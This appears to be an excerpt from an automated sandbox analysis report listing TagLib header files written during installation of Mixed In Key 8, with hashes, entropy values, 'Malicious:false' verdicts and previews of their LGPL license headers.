                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_SpWYRX
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII English text
                                                                                                    Size (bytes):2570
                                                                                                    Entropy (8bit):4.192302946221823
                                                                                                    Encrypted:false
                                                                                                    MD5:772E512253C3CAF8596EE696B12E7998
                                                                                                    SHA1:F48CB436BB0192FC0DADD272512C1DDF89C9167D
                                                                                                    SHA-256:76915C60B93336E8CB211E7F55E1D729C3CBA5A1AC96322D0BEA25B195B8340A
                                                                                                    SHA-512:43A96310697F59254966E7CBDF923784DAAD2A9C2924C323D78171FE1B5C011A933672F6BD961095997885FE123AF9128E68437FE281820AB8CEF40FFA58A43F
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: /***************************************************************************. copyright : (C) 2002 - 2008 by Scott Wheeler. email : wheeler@kde.org. ***************************************************************************/../***************************************************************************. * This library is free software; you can redistribute it and/or modify *. * it under the terms of the GNU Lesser General Public License version *. * 2.1 as published by the Free Software Foundation. *. * *. * This library is distributed in the hope that it will be useful, but *. * WITHOUT ANY WARRANTY; without even the implied warranty of *. * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU *. * Lesser General Public License for more details. *. *
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_Th1CSx
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII English text
                                                                                                    Size (bytes):4662
                                                                                                    Entropy (8bit):4.265371385380305
                                                                                                    Encrypted:false
                                                                                                    MD5:AD7B589828E41EEEBE339EA5D249A4CB
                                                                                                    SHA1:B5F6FBE315265E88A5F582AF76D1900146192300
                                                                                                    SHA-256:1AC4F964D01B0F08D2C2F8F4D86A1E445A54FA66BF6F215EBA4EB84A5962980F
                                                                                                    SHA-512:E5F8BF45669C88BCDFB82F25A214773D04D08A4011404875DF3C9093A1B19F5F2DB024C482AFFA604379E1F0E8832D46B3F3E6A579A71E37A59EE9CA8074FADB
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: /***************************************************************************. copyright : (C) 2003 by Allan Sandfeld Jensen. email : kde@carewolf.org. ***************************************************************************/../***************************************************************************. * This library is free software; you can redistribute it and/or modify *. * it under the terms of the GNU Lesser General Public License version *. * 2.1 as published by the Free Software Foundation. *. * *. * This library is distributed in the hope that it will be useful, but *. * WITHOUT ANY WARRANTY; without even the implied warranty of *. * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU *. * Lesser General Public License for more details. *. *
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_UB9W4E
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:UTF-8 Unicode English text
                                                                                                    Size (bytes):2609
                                                                                                    Entropy (8bit):4.236914883635004
                                                                                                    Encrypted:false
                                                                                                    MD5:5AAF2C4B5A3B802C1415D0470052FF25
                                                                                                    SHA1:CF0B8E3295D8CF5447FCCCEE4AAFDBAD4E9CA341
                                                                                                    SHA-256:0ADDF57A4EA7AE942BA96107287CFC7E03866A1271D6EECCE098129CEE958D56
                                                                                                    SHA-512:932B5A781EE2E4A38321510061C6A7BF4552DE75807517BBBF6BB07032CFCA8644701AB27AAC305CF27B6ED89C1289056CD3D63684559F940FA0704BD470892D
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: /**************************************************************************. copyright : (C) 2010 by Luk.... Lalinsk... email : lalinsky@gmail.com. **************************************************************************/../***************************************************************************. * This library is free software; you can redistribute it and/or modify *. * it under the terms of the GNU Lesser General Public License version *. * 2.1 as published by the Free Software Foundation. *. * *. * This library is distributed in the hope that it will be useful, but *. * WITHOUT ANY WARRANTY; without even the implied warranty of *. * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU *. * Lesser General Public License for more details. *. *
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_UxDkzI
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII English text
                                                                                                    Size (bytes):7170
                                                                                                    Entropy (8bit):4.418055674172905
                                                                                                    Encrypted:false
                                                                                                    MD5:B17A7BC2F8EB638DFD98B990ED248808
                                                                                                    SHA1:9D6FCAF159F83B2FCF73C01B6AFD4F6E898ADCC3
                                                                                                    SHA-256:37BA0928E258C51F3A3E3D9AAE133D0CEAD7BDF0B4F35D30EBB44B78DA83BF2A
                                                                                                    SHA-512:C80CDE3B8DAE882A5BC7FD5D42E558EEE3602EFCF1AB9926091AB62DDA4CF2ADF15E3515F7666ADB4D9034355CEBB459B4835092AF23282EC94E2709B274DAE7
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: /***************************************************************************. copyright : (C) 2004 by Allan Sandfeld Jensen. email : kde@carewolf.org. ***************************************************************************/../***************************************************************************. * This library is free software; you can redistribute it and/or modify *. * it under the terms of the GNU Lesser General Public License version *. * 2.1 as published by the Free Software Foundation. *. * *. * This library is distributed in the hope that it will be useful, but *. * WITHOUT ANY WARRANTY; without even the implied warranty of *. * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU *. * Lesser General Public License for more details. *. *
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_VTT8eA
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:UTF-8 Unicode English text
                                                                                                    Size (bytes):4158
                                                                                                    Entropy (8bit):4.260274274969449
                                                                                                    Encrypted:false
                                                                                                    MD5:B3903442177BDCD266606E7CD6FCD5DD
                                                                                                    SHA1:747A7A7B188DF24E735E833973E66028EE49649C
                                                                                                    SHA-256:4C1D8D310BE760FEC95D6BD49912199EBDBBBF8BC0AFD2705D26C996B6AB305C
                                                                                                    SHA-512:993333EDD3C3BE09E28171FCCE843D6FC0C4DE41E13C498C6DEF7DD23ECA3A150FC3546589EF161FA40509B6EA2C4CF119EDA31379B211A4E7F2F4672C218478
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: /***************************************************************************. copyright : (C) 2011 by Mathias Panzenb..ck. email : grosser.meister.morti@gmx.net. ***************************************************************************/../***************************************************************************. * This library is free software; you can redistribute it and/or modify *. * it under the terms of the GNU Lesser General Public License version *. * 2.1 as published by the Free Software Foundation. *. * *. * This library is distributed in the hope that it will be useful, but *. * WITHOUT ANY WARRANTY; without even the implied warranty of *. * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU *. * Lesser General Public License for more details. *. *
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_VY5wWf
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII English text
                                                                                                    Size (bytes):7459
                                                                                                    Entropy (8bit):4.756809096910263
                                                                                                    Encrypted:false
                                                                                                    MD5:4548BC51A0AD816DFBAD552C36CA2D75
                                                                                                    SHA1:052009F7A15E286B8FC3E16C5660A37E8E742389
                                                                                                    SHA-256:BF808BD2A4071C7CFFAB3BAE963C85311E96766819031F0F875F1AF2710EB111
                                                                                                    SHA-512:A7024BDE0F2BD3899E370618B9BAF1FD47F52378D5CE72FACB7D9EAD4EDC7825A28E0CB07EB48B10D4B500A6D5B18AF6F471FB266C56F35653C39ECB6ACAD2D3
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: /***************************************************************************. copyright : (C) 2013 by Tsuda Kageyu. email : tsuda.kageyu@gmail.com. ***************************************************************************/../***************************************************************************. * This library is free software; you can redistribute it and/or modify *. * it under the terms of the GNU Lesser General Public License version *. * 2.1 as published by the Free Software Foundation. *. * *. * This library is distributed in the hope that it will be useful, but *. * WITHOUT ANY WARRANTY; without even the implied warranty of *. * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU *. * Lesser General Public License for more details. *. *
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_WlXrwa
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII English text
                                                                                                    Size (bytes):5117
                                                                                                    Entropy (8bit):4.17048532102651
                                                                                                    Encrypted:false
                                                                                                    MD5:5325F341678D9E264B5687B2BBCB49B2
                                                                                                    SHA1:6B10959FD8A17AC6CF1E46584DBE8EDD8BE8D1D0
                                                                                                    SHA-256:5418833B6B270B4498EE9BF0DBED5EBC7BF4B991B36E9E4108C17C31E80950BA
                                                                                                    SHA-512:F3D7421025A0E269065EC960EA8E586BEDC53BA7093DA6CB1E05C9A2D80AD35B6B73D3B61497187F27AAE02D8BD2FA2BE6FC5E8E4B7D63FE7DD111650BFE0DA1
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: /***************************************************************************. copyright : (C) 2008 by Scott Wheeler. email : wheeler@kde.org.***************************************************************************/../***************************************************************************. * This library is free software; you can redistribute it and/or modify *. * it under the terms of the GNU Lesser General Public License version *. * 2.1 as published by the Free Software Foundation. *. * *. * This library is distributed in the hope that it will be useful, but *. * WITHOUT ANY WARRANTY; without even the implied warranty of *. * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU *. * Lesser General Public License for more details. *. *
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_XdZjtz
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:UTF-8 Unicode English text
                                                                                                    Size (bytes):4490
                                                                                                    Entropy (8bit):4.173402861840568
                                                                                                    Encrypted:false
                                                                                                    MD5:EC4A4F86112DF9D5C7422A3A8576CF86
                                                                                                    SHA1:ED99B33A312A8D198FC7F3F2371D5D338F70CDE0
                                                                                                    SHA-256:85C02A960AE868A6B1A5C9F5FC6D8883C8624D9C75044E90C66B7E9BBA9B08C7
                                                                                                    SHA-512:AD75924694E495875519BCA5DB0B7454F5B9FCC37F305FFBBAA63E9C7BB9ACEAC993E463E6F7AD7D136F080B36B1E3F2ECF4450AD3393130573232B2077F8D4A
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: /***************************************************************************. copyright : (C) 2012 by Luk.... Lalinsk... email : lalinsky@gmail.com.. copyright : (C) 2002 - 2008 by Scott Wheeler. email : wheeler@kde.org. (original Vorbis implementation).***************************************************************************/../***************************************************************************. * This library is free software; you can redistribute it and/or modify *. * it under the terms of the GNU Lesser General Public License version *. * 2.1 as published by the Free Software Foundation. *. * *. * This library is distributed in the hope that it will be useful, but *. * WITHOUT ANY WARRANTY; without even the implied warranty of *. * MERCHANTABILITY or FITNESS FOR A P
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_YQXOKe
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII English text
                                                                                                    Size (bytes):18879
                                                                                                    Entropy (8bit):4.413817636238626
                                                                                                    Encrypted:false
                                                                                                    MD5:AE8DB772E90E8F98342C598F11F54CD0
                                                                                                    SHA1:840FDC6ABF2192D5A9DCF58DF04199A079564835
                                                                                                    SHA-256:C5BF37F679D4DF81FF5E2F29FD77372CBD52235B885135DD00F63B934734E8E3
                                                                                                    SHA-512:8389F95D66EAA1F09A510D7D68D3BBAEB9CF18D006F4C9A26A119934CB7D495C5A6E9BC581DA883157472CA43A7F5F2ADC3A91AC926555E7F4ACA1887B6A40B3
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: /***************************************************************************. copyright : (C) 2002 - 2008 by Scott Wheeler. email : wheeler@kde.org. ***************************************************************************/../***************************************************************************. * This library is free software; you can redistribute it and/or modify *. * it under the terms of the GNU Lesser General Public License version *. * 2.1 as published by the Free Software Foundation. *. * *. * This library is distributed in the hope that it will be useful, but *. * WITHOUT ANY WARRANTY; without even the implied warranty of *. * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU *. * Lesser General Public License for more details. *. *
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_YhXxOl
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII English text
                                                                                                    Size (bytes):7624
                                                                                                    Entropy (8bit):4.298019813088321
                                                                                                    Encrypted:false
                                                                                                    MD5:7087CAC8FB619E4CCD57D9A7CF1467A9
                                                                                                    SHA1:64B5F18FC65834B58B4B762EB79F8E08F05784FC
                                                                                                    SHA-256:3411B98207390A85E7D2CF183C539BBE96598D56B4ECFBF8412A9257784D47A6
                                                                                                    SHA-512:4525824263DC9BC240AF46C94A7F7572866573F225706A45BD59AB57888BBFE35A4F95D496A884FD0FA5E231B3C0839C7CB72952ADEE334C73E2CE95B3933AC0
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: /***************************************************************************. copyright : (C) 2002 - 2008 by Scott Wheeler. email : wheeler@kde.org. ***************************************************************************/../***************************************************************************. * This library is free software; you can redistribute it and/or modify *. * it under the terms of the GNU Lesser General Public License version *. * 2.1 as published by the Free Software Foundation. *. * *. * This library is distributed in the hope that it will be useful, but *. * WITHOUT ANY WARRANTY; without even the implied warranty of *. * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU *. * Lesser General Public License for more details. *. *
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_YrCsde
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII English text
                                                                                                    Size (bytes):7117
                                                                                                    Entropy (8bit):4.280676998202901
                                                                                                    Encrypted:false
                                                                                                    MD5:DF75E9C52D00971D485E3D19CEBAB3A5
                                                                                                    SHA1:8FEA41E2005F7758785282BA5DA9FCA6F4471156
                                                                                                    SHA-256:67745E74F1CD524E64B0A914B5821D0BE475AFCFD74CDF3A33C0A3FC04763A8D
                                                                                                    SHA-512:792F7D8483B59D7A60EB59363EAB25534B212F89FBEBE7D2BC6793D661739126A971D4E7A24F5C28AF7FF0ADAB48A242C373F256EBDDBFACC7980370D1160302
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: /**************************************************************************. copyright : (C) 2010 by Anton Sergunov. email : setosha@gmail.com. **************************************************************************/../***************************************************************************. * This library is free software; you can redistribute it and/or modify *. * it under the terms of the GNU Lesser General Public License version *. * 2.1 as published by the Free Software Foundation. *. * *. * This library is distributed in the hope that it will be useful, but *. * WITHOUT ANY WARRANTY; without even the implied warranty of *. * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU *. * Lesser General Public License for more details. *. *
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_ZFft9I
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII English text
                                                                                                    Size (bytes):4796
                                                                                                    Entropy (8bit):4.37930151960639
                                                                                                    Encrypted:false
                                                                                                    MD5:90378EA4E7E3169C1FE8D90B3A21C202
                                                                                                    SHA1:F57EFCF2CC9AE08B20DC26717EF1DE9C54D79C03
                                                                                                    SHA-256:CD138C1FCB40A05181E979937F228CAF2264C395B978FC5AA5907E0931D82522
                                                                                                    SHA-512:C2B2D424FA60B06EFF71B76B60EF3113C23E6E3E2F47C9777CAD10231631CBA7A44184207AC2A35FF3535235B24E43DC3516BC221AD395FBD62F07618952957A
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: /***************************************************************************. copyright : (C) 2011 by Lukas Lalinsky. email : lalinsky@gmail.com. ***************************************************************************/../***************************************************************************. * This library is free software; you can redistribute it and/or modify *. * it under the terms of the GNU Lesser General Public License version *. * 2.1 as published by the Free Software Foundation. *. * *. * This library is distributed in the hope that it will be useful, but *. * WITHOUT ANY WARRANTY; without even the implied warranty of *. * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU *. * Lesser General Public License for more details. *. *
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_ZXOeMJ
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII English text
                                                                                                    Size (bytes):7473
                                                                                                    Entropy (8bit):4.869416007568782
                                                                                                    Encrypted:false
                                                                                                    MD5:7993B67B429E5A392827472A38F99813
                                                                                                    SHA1:F2E524DB046538FC37080FC577E2CDA53D885887
                                                                                                    SHA-256:0C718E1BCDB2B3474094C3EE309C69F528FC97AB904A0669F10C9ACF31906893
                                                                                                    SHA-512:0D1DAC1FB73B054A74AB662FE0074194A553E1DDE63545B599A58BBD153BEDF9FFDE8EF60BCA7298D465AF8F68B214B6F37BA2485C9276A563A404A68B9E3FE5
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: /***************************************************************************. copyright : (C) 2002 - 2008 by Scott Wheeler. email : wheeler@kde.org. ***************************************************************************/../***************************************************************************. * This library is free software; you can redistribute it and/or modify *. * it under the terms of the GNU Lesser General Public License version *. * 2.1 as published by the Free Software Foundation. *. * *. * This library is distributed in the hope that it will be useful, but *. * WITHOUT ANY WARRANTY; without even the implied warranty of *. * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU *. * Lesser General Public License for more details. *. *
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_ZixLOn
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:UTF-8 Unicode English text
                                                                                                    Size (bytes):4251
                                                                                                    Entropy (8bit):4.162450657570428
                                                                                                    Encrypted:false
                                                                                                    MD5:EAC0CE122A38823099811F2F2A3DD40C
                                                                                                    SHA1:672D75FBD39FF435A61C67E4A481D5F01F70B77E
                                                                                                    SHA-256:741CDC094C0567F04DC4BFDF1338E375470FBC1A1FFAAA3BC485ECDFC57CFF76
                                                                                                    SHA-512:88C24C6357713F0977174B80F4C14E7008093258E72DDDCCE4FB6FD3E71A76FD59654EBDAB2D379B80BA7D46E85841D1F78965168087FD59D82EBF6C8EABCF78
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: /***************************************************************************. copyright : (C) 2006 by Luk.... Lalinsk... email : lalinsky@gmail.com.. copyright : (C) 2002 - 2008 by Scott Wheeler. email : wheeler@kde.org. (original Vorbis implementation).***************************************************************************/../***************************************************************************. * This library is free software; you can redistribute it and/or modify *. * it under the terms of the GNU Lesser General Public License version *. * 2.1 as published by the Free Software Foundation. *. * *. * This library is distributed in the hope that it will be useful, but *. * WITHOUT ANY WARRANTY; without even the implied warranty of *. * MERCHANTABILITY or FITNESS FOR A P
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_aklzlB
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII English text
                                                                                                    Size (bytes):9082
                                                                                                    Entropy (8bit):4.351864931572195
                                                                                                    Encrypted:false
                                                                                                    MD5:5759BD74D4C22371B1E63D4FCE81D150
                                                                                                    SHA1:06E7496BAB1444E4937C3A19BC7375BAA048725D
                                                                                                    SHA-256:0EBE2D57AA10E71F7E85E4850F6C4566932B2ED212C518AD01C87D26B5B13957
                                                                                                    SHA-512:632FFE05CFF451776091B3A9755C2DDE272500932038ABA0BC251D31C226110A0E14125313AB2E316EC8E87EC556214668AC0E472980E22DD9759A4631E07E94
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: /***************************************************************************. copyright : (C) 2013 by Lukas Krejci. email : krejclu6@fel.cvut.cz. ***************************************************************************/../***************************************************************************. * This library is free software; you can redistribute it and/or modify *. * it under the terms of the GNU Lesser General Public License version *. * 2.1 as published by the Free Software Foundation. *. * *. * This library is distributed in the hope that it will be useful, but *. * WITHOUT ANY WARRANTY; without even the implied warranty of *. * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU *. * Lesser General Public License for more details. *. *
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_b4ZKXc
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:UTF-8 Unicode English text
                                                                                                    Size (bytes):4787
                                                                                                    Entropy (8bit):4.366628892669605
                                                                                                    Encrypted:false
                                                                                                    MD5:70A1B5C875F4685A3B8A093650C444EA
                                                                                                    SHA1:8448618C6E6A0B4960225640E2DE667FD49351B1
                                                                                                    SHA-256:30A921D282165DFC9E3BD3221D05A70D2522C0AE2082F2020E502C253B35A2A0
                                                                                                    SHA-512:892D5DD8399E4BD66F26DE597D88DE5FB3BBC029C508E72B03D499D0B7DDCD40E91389440CF6F1BE1A5A6921D1389A5BB2773D2F1147545DD7A9449B4C34919F
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: /**************************************************************************. copyright : (C) 2007 by Luk.... Lalinsk... email : lalinsky@gmail.com. **************************************************************************/../***************************************************************************. * This library is free software; you can redistribute it and/or modify *. * it under the terms of the GNU Lesser General Public License version *. * 2.1 as published by the Free Software Foundation. *. * *. * This library is distributed in the hope that it will be useful, but *. * WITHOUT ANY WARRANTY; without even the implied warranty of *. * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU *. * Lesser General Public License for more details. *. *
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_bFVFPS
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:UTF-8 Unicode English text
                                                                                                    Size (bytes):4673
                                                                                                    Entropy (8bit):4.552283333047044
                                                                                                    Encrypted:false
                                                                                                    MD5:2FA515C5501E1377E52C8BF65D7C13F7
                                                                                                    SHA1:4DEF98B2D4D6A03FCFB65281F432B1F53DCFDF72
                                                                                                    SHA-256:406E5FFD3E90C93CA8DE7150F0F8BCCBC1374FFF348A951A33203FBC5A9DC7E4
                                                                                                    SHA-512:C51C24C3C53CE73DA033CB1282095104BA7F8C5E3A3515B41656DBE18C204E2F6947B357674D68EFDBF03A258545BD5FE75A55CCAE6D5CC435A5E0E4C735F094
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: /**************************************************************************. copyright : (C) 2007,2011 by Luk.... Lalinsk... email : lalinsky@gmail.com. **************************************************************************/../***************************************************************************. * This library is free software; you can redistribute it and/or modify *. * it under the terms of the GNU Lesser General Public License version *. * 2.1 as published by the Free Software Foundation. *. * *. * This library is distributed in the hope that it will be useful, but *. * WITHOUT ANY WARRANTY; without even the implied warranty of *. * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU *. * Lesser General Public License for more details. *. *
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_bhGASy
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:UTF-8 Unicode English text
                                                                                                    Size (bytes):5996
                                                                                                    Entropy (8bit):4.357755244132586
                                                                                                    Encrypted:false
                                                                                                    MD5:C2EFF8DF3BC1493EE8B5817119719B50
                                                                                                    SHA1:08E997AC22335E59C21CC32148006B6BF0052258
                                                                                                    SHA-256:B9E6DD6E8813A112FFE8D4999C94B5E30AB083F15F6F8D1181C7780FA17C85A0
                                                                                                    SHA-512:517AF27900C385A06EE6F267E88B2C5205828501A7FFA7311EDDCE6754556F941E967BB2C8DF4564AE61A1EB6D2BD3B1DBC43C65988F1141F8B83A43CC2B0DDB
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: /**************************************************************************. copyright : (C) 2005-2007 by Luk.... Lalinsk... email : lalinsky@gmail.com. **************************************************************************/../***************************************************************************. * This library is free software; you can redistribute it and/or modify *. * it under the terms of the GNU Lesser General Public License version *. * 2.1 as published by the Free Software Foundation. *. * *. * This library is distributed in the hope that it will be useful, but *. * WITHOUT ANY WARRANTY; without even the implied warranty of *. * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU *. * Lesser General Public License for more details. *. *
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKTag.framework/Versions/A/Frameworks/TagLib.framework/Versions/A/Headers/.BC.T_bk7xM0
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII English text
                                                                                                    Size (bytes):7369
                                                                                                    Entropy (8bit):4.625451404861965
                                                                                                    Encrypted:false
                                                                                                    MD5:B1AA362EC5310017ADAF0F8002BEC531
                                                                                                    SHA1:072FEC0E11B3183E70D4CD4CE2B76E3F24AB8C78
                                                                                                    SHA-256:250F793B6BAB6DA484D7B080AD5994880C591C89BCD9F8A5E955F47010E5ECE8
